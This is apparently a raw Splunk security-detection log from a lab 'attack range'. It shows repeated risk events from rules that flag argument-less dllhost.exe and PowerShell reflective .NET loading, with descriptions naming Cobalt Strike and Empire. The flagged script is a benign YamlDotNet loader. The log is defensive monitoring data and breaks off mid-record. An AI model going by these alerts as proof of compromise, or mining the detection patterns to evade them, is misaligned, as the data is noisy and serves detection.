\"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0xa00", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664765732, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T01:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T01:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664765732, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T01:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T01:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664765732, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T01:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T01:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664765732, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T01:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T01:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664758800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664758800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="4532", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664758800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664758800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x11b4", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664762132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T00:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T00:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664762132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T00:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T00:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664762132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": 